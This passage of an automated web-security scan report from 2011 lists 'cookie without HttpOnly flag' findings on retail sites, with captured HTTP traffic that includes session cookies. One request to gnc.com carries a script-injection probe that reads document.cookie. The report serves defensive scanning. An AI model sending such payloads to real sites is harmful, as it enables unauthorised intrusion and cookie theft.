bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; Domain=.bluenile.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.155. http://www.brookstone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=57e630f1ac3975343e628615fd50d784e754034066e5db8e4dd085e360ac0ec57d901b7a; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_pers=%20s_nr%3D1305510909785%7C1368582909785%3B%20s_lv%3D1305510909788%7C1400118909788%3B%20s_lv_s%3DFirst%2520Visit%7C1305512709788%3B%20s_vs%3D1%7C1305512709800%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 02:03:15 GMT
Set-Cookie: TS657dfa=57e630f1ac3975343e628615fd50d784e754034066e5db8e4dd085e360ac0ec57d901b7a; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\..... .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

13.156. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/floating-daybed-with-canopy-pool-lounger.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=3e167d73b2313d63b52b8915c1fc32dbe754034066e5db8e4dd0fe0560ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241 HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543287875%3B; s_sess=%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Aoutdoor%25252520%25252526amp%2525253B%25252520patio%25252520furniture%2525253Aoutdoor%25252520wood%25252520furniture%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html%2525253Fbkiid%2525253DsubCategoryLandingPage%252526ot%25253DA%3B

Response

13.157. http://www.brookstone.com/formhandlerservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/formhandlerservlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
TS657dfa=9b7bc19cfee8ac65b1bc9a09721745d0e754034066e5db8e4dd0fe0e60ac0ec56e0e08002bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc52bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc5; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /formhandlerservlet HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241
Origin: http://www.brookstone.com
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543302812%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dproduct%25252520detail%2525253AOASIS%25252520LOUNGER%25252528706978p%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/imageservlet%2525253FwebImageName%2525253DaddToCart.gif%25252526languageId%2525253DEN%25252526imageVer%2525253D6704%252526ot%25253DIMAGE%3B
Content-Length: 82

formName=addToCartAjax&currentNodeLink=%2FproductDetail.jsp&quantity_11370241=1&_=

Response

HTTP/1.1 200 OK
Set-Cookie: cart_items_2=2; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: account_firstName_2=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_items_2=2; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: account_firstName_2=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 1123
Date: Mon, 16 May 2011 10:35:58 GMT
Set-Cookie: TS657dfa=9b7bc19cfee8ac65b1bc9a09721745d0e754034066e5db8e4dd0fe0e60ac0ec56e0e08002bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc52bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc5; Path=/

{"status":"results","omniture":{"events":"scAdd","products":";706978p"},"cart":{"couponTotal":"$0.00","currentProductShortName":"Oasis Lounger","currentProductSku":"706978","giftWrapTotal":"$0.00","gr
...[SNIP]...

13.158. http://www.brookstone.com/outdoor-living.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/outdoor-living.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=9e8001d74d4e447255a75f517db728f1e754034066e5db8e4dd086af60ac0ec57d901b7a; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /outdoor-living.html?bkiid=homePage|CXTopNav1FDT|outdoor_living HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512915786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 05:06:39 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:06:39 GMT
Set-Cookie: TS657dfa=9e8001d74d4e447255a75f517db728f1e754034066e5db8e4dd086af60ac0ec57d901b7a; Path=/
Content-Length: 118287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.159. http://www.brookstone.com/shoppingCart.jsp.vr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/shoppingCart.jsp.vr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=02ff95a5e2b4b81f69fff5bd65984d7ce754034066e5db8e4dd0fe0d60ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingCart.jsp.vr HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543306797%3B

Response

13.160. https://www.brookstone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.161. https://www.brookstone.com/formhandlerservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.162. http://www.gnc.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1 HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

13.163. http://www.gnc.com/recommendationpixel/user.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/recommendationpixel/user.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

recommendationUid=1096126108310753991; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recommendationpixel/user.jsp?uid=1096126108310753991 HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543444162%7C1308135444162%3B%20gpv_p6%3DHome%2520Page%7C1305545244163%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; browser_id=125602265854

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: recommendationUid=1096126108310753991; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0

13.164. http://www.guitarcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CjPID=2537521; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
CjAID=10453836; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
source=4ACJWXX2; path=/
UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
UNICASOURCEL=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?CJAID=10453836&CJPID=2537521 HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; mbox=check#true#1305510080|session#1305510019406-714170#1305511880|PC#1305510019406-714170.17#1308102028; fcspersisthp-slider=2

Response

13.165. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c27,24783,53c27,18653,53bro,33114,00000,24782,53c27,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.166. http://www.orderhouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orderhouse.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

InitialEventId=24102330; expires=Wed, 16-May-2012 10:39:08 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orderhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.orderhouse.com/default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=l33k2h455vp2pnb3z2p44qqo; path=/; HttpOnly
Set-Cookie: AccountType=; expires=Wed, 16-Nov-2011 11:39:08 GMT; path=/
Set-Cookie: Pref=0; expires=Wed, 16-Nov-2011 11:39:08 GMT; path=/
Set-Cookie: InitialEventId=24102330; expires=Wed, 16-May-2012 10:39:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:07 GMT
Content-Length: 156

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.orderhouse.com/default.aspx">here</a>.</h2>
</body></html>

13.167. http://www.petco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
SL_UVId=28F6BEFE806000C3;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

13.168. http://www.petco.com/Secure/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/Secure/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SL_UVId=28F6BEFE806000C3;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.169. http://www.redcrossstore.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

InitialEventId=24098233; expires=Wed, 16-May-2012 02:07:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://american.redcross.org/site/PageServer?pagename=ntld_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ihgw4r55c5v3o245hxpjpj3h; path=/; HttpOnly
Set-Cookie: AccountType=; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: Pref=0; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: InitialEventId=24098233; expires=Wed, 16-May-2012 02:07:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:07:38 GMT
Content-Length: 48252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
<head>
<meta http-equiv="content-type" conten
...[SNIP]...

13.170. http://www.restorationhardware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; TS1c138a=3df5ee0d2da226cbb8724d51bbf2990e2efa223a5124b4964dd084fd; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; engagement=1; promobanner=viewed; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

13.171. http://www.restorationhardware.com/content/promo.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/content/promo.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

